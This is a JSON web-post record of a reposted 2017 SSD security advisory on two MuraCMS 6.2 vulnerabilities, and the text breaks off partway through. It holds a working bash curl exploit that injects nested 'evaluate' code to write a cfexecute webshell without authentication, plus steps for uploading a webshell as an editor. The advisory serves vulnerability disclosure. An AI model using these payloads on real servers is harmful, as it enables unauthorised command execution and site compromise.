{"id":6854,"date":"2017-03-03T14:19:22","date_gmt":"2017-03-03T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/03\/news-645\/"},"modified":"2017-03-03T14:19:22","modified_gmt":"2017-03-03T22:19:22","slug":"news-645","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/03\/news-645\/","title":{"rendered":"SSD Advisory \u2013 MuraCMS Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Fri, 03 Mar 2017 16:04:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in MuraCMS version 6.2. MuraCMS is an open source content management system for CFML, created by Blue River Interactive Group. Mura has been designed to be used by marketing departments, web designers and developers.<\/p>\n<p>The vulnerabilities found in MuraCMS are:<\/p>\n<ol>\n<li>Unauthenticated remote arbitrary code execution<\/li>\n<li>Unrestricted file upload<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> BlurRiver has released patch to address the vulnerabilities: &#8220;we put builds with the vulnerabilities patched and then released a blog as well as communicated via our Google group, Slack channel, twitter and mailing list.&#8221;<\/p>\n<p>The patch and blog post can be found <a href=\"http:\/\/www.getmura.com\/blog\/critical-security-update-for-mura-cms-all-versions-prior-to-7-0-6852\/\">here<\/a><\/p>\n<p><span id=\"more-2955\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Unauthenticated remote arbitrary code execution<\/strong><br \/> The vulnerable function that can lead to remote arbitrary code execution is &#8220;<em>evaluate<\/em>&#8221; and can be found in a<em>dmin\/Application.cfm<\/em>. <\/p>\n<p>The function &#8220;<em>evaluate<\/em>&#8221; is evaluates dynamically its parameter (string). In this case it is used with the intent of checking the value of a http&#8217;s parameter. This parameter depends on the variable \u201c<em>#theParam#<\/em>\u201c, that is obtained by splitting another http&#8217;s parameter, named \u201c<em>param<\/em>\u201d.<\/p>\n<p>An Attacker can inject arbitrary code into this parameter. An example of malicious code could be \u201c1+or+eq+&lt;a function>\u201d. So the evaluate function will evaluate the string \u201crequest.context.paramField1+or+eq+&lt;\/a>&lt;a function>\u201d.<\/p>\n<p>However, because of the splitting function (\u201c<em>listLen<\/em>\u201d), you can inject only functions that have none or one parameter, because if a function has two or more parameters it will be splitted, and it will return a fatal error<\/p>\n<p>In order to bypass this issue, an attacker can simply pass another <em>evaluate<\/em> function, with a different http&#8217;s parameter as argument. So the malicious code will be \u201c1+or+eq+evaluate(#request.context.payload#)\u201d , having no commas, putting the malicious code inside payload.<\/p>\n<p><u>Vulnerable code: File:\/admin\/Application.cfm Line:428<\/u><br \/> The code will be executed every time, even if the users isn&#8217;t logged in. Since the function that checks the user session will continue the execution of the code even if the user isn&#8217;t logged in, it will only modify the \u201c<em>location<\/em>\u201d.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b9ebe9cb5f6013274340\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if(request.context.param neq &#8221;){        session.paramArray=arrayNew(1);        session.paramCircuit=listLast(listFirst(request.context.muraAction,&#8217;.&#8217;),&#8217;:&#8217;);        for(i=1;i lte listLen(request.context.param);i=i+1){              theParam=listGetAt(request.context.param,i);              if(evaluate(&#8216;request.context.paramField#theParam#&#8217;) neq &#8216;Select Field&#8217;                    and evaluate(&#8216;request.context.paramField#theParam#&#8217;) neq &#8221;                    and evaluate(&#8216;request.context.paramCriteria#theParam#&#8217;) neq &#8221;){<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b9ebe9cb5ff973659367\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/bash  host=&#8221;127.0.0.1&#8243;  path=&#8221;\/&#8221;   url=&#8221;${path}admin\/&#8221;  useragent=&#8221;User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:42.0) Gecko\/20100101 Firefox\/42.0&#8243;      #Here the code to be uploaded and write into a file in the home directory  shell=&#8221;&lt;cfexecute   name = &#8216;whoami&#8217;  arguments = &#8221; timeout=2&gt; &lt;\/cfexecute&gt;&#8221;   #filename of the uploaded file  shellname=&#8221;shell.cfm&#8221;   #Path of the shell. It must not be \/admin\/ path, because it will ask for user login.  shellpath=&#8221;..\/&#8221;   #Payload: in this case it will write a file   payload=&#8221;FileWrite(&#8220;${shellpath}${shellname}&#8221;, &#8220;${shell}&#8221;)&#8221;      #Run requests.   curl -i -s -k -X &#8220;POST&#8221; -H &#8220;User-Agent: ${useragent}&#8221;   -H &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;    -b &#8221;   &#8211;data-binary $&#8221;param=1+eq+true+or+evaluate(#request.context.payload#)&amp;paramField1=false&amp;payload=${payload}&#8221;         &#8220;http:\/\/${host}${url}&#8221;  resp=`curl -i -s -k -H &#8220;User-Agent: ${useragent}&#8221;  &#8220;http:\/\/${host}\/${shellname}&#8221;`   echo $resp<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb5ff973659367-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-1\"><span class=\"crayon-p\">#!\/bin\/bash<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-2\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;127.0.0.1&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-3\"><span class=\"crayon-v\">path<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;\/&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-4\"><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;${path}admin\/&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-5\"><span class=\"crayon-v\">useragent<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:42.0) Gecko\/20100101 Firefox\/42.0&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-7\"><span class=\"crayon-p\">#Here the code to be uploaded and write into a file in the home directory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-8\"><span class=\"crayon-v\">shell<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&lt;cfexecute&nbsp;&nbsp; name = &#8216;whoami&#8217;&nbsp;&nbsp;arguments = &#8221; timeout=2&gt; &lt;\/cfexecute&gt;&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-9\"><span class=\"crayon-p\">#filename of the uploaded file<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-10\"><span class=\"crayon-v\">shellname<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;shell.cfm&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-11\"><span class=\"crayon-p\">#Path of the shell. It must not be \/admin\/ path, because it will ask for user login.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-12\"><span class=\"crayon-v\">shellpath<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;..\/&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-13\"><span class=\"crayon-p\">#Payload: in this case it will write a file <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-14\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;FileWrite(&#8220;${shellpath}${shellname}&#8221;, &#8220;${shell}&#8221;)&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-15\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-16\"><span class=\"crayon-p\">#Run requests. <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-17\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;POST&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User-Agent: ${useragent}&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-18\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Content-Type: application\/x-www-form-urlencoded&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-19\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-20\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">binary<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-s\">&#8220;param=1+eq+true+or+evaluate(#request.context.payload#)&amp;paramField1=false&amp;payload=${payload}&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;http:\/\/${host}${url}&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb5ff973659367-22\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User-Agent: ${useragent}&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;http:\/\/${host}\/${shellname}&#8221;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb5ff973659367-23\"><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">resp<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p><strong>Unrestricted file upload<\/strong><br \/> MuraCMS allows its end users to upload as well as download files on the server. MuraCMS does not sanitize the file properly before moving it to an uploads directory. Every user logged in the web application with editing permissions, could upload a malicious webshell. <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<ol>\n<li>Login with test editor user and go to the site manager page<\/li>\n<li>Click on \u201cedit\u201d button in <em>&#8220;Home&#8221;<\/em>  <\/li>\n<li>In the \u201c<em>Assign Associated Image<\/em>\u201d section click on browse and upload the malicious <em>webshell.cfm<\/em> from your pc<\/li>\n<li>Click on publish button<\/li>\n<li>In order to know where the file is located it enough to fire up a web intercepting tool like Burp or Tamper data and click on download file.<\/li>\n<li>If you will use the Burp for example. you can able to see a request like following:<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b9ebe9cb602794712843\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/index.cfm\/_api\/render\/file\/?fileid=ABD5B173-790C-4973-  991504D56A3DF2B5&amp;method=attachment&amp;size=source HTTP\/1.1    Host: 192.168.0.101:8888  User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko\/20100101 Firefox\/42.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  Accept-Encoding: gzip, deflate  Page 6 of 7  Referer: http:\/\/192.168.0.101:8888\/admin\/?muraAction=cArch.edit&amp;contenthistid=E854D858-A5EF-46FAA8F5F7B343C93958&amp;siteid=default&amp;contentid=00000000000000000000000000000000001&amp;topid=00000000000000000000000000000000001&amp;type=Page&amp;parentid=00000000000000000000000000000000END&amp;moduleid=00000000000000000000000000000000000  Cookie: cfid=f4d255c5-4789-420c-8a41-a925671b1ae0; cftoken=0;  ORIGINALURLTOKEN=A589BA35-0260-4163-BF03CCC534A9AFC7; MOBILEFORMAT=false;  JSESSIONID=D06BAFB1A7DFCE934D82C6B804CD7AEE; CKFinder_Path=default_Site_Files%3A%2Fcache%2Ffile%2F%3A1;  FETDISPLAY=; REMEMBER=0; SUBSCRIBE=0; NAME=; URL=; EMAIL=  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b9ebe9cb602794712843-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b9ebe9cb602794712843-15\">15<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cfm<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">_api<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">render<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">fileid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ABD5B173<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">790C<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4973<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-2\"><span class=\"crayon-cn\">991504D56A3DF2B5<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">attachment<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">source <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-4\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.0.101<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8888<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Macintosh<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Intel <\/span><span class=\"crayon-e\">Mac <\/span><span class=\"crayon-i\">OS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.10<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">42.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span 